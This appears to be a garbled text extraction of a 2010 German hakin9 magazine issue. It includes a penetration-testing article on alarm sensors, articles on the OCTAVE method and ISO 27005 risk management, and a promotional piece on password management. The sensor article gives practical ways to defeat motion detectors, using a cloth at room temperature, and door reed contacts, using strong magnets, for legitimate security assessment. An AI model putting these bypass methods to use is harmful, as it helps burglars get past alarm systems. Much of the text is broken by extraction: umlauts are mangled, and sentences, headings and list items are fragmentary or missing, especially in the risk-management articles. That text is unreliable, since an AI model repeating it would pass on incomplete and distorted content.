BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
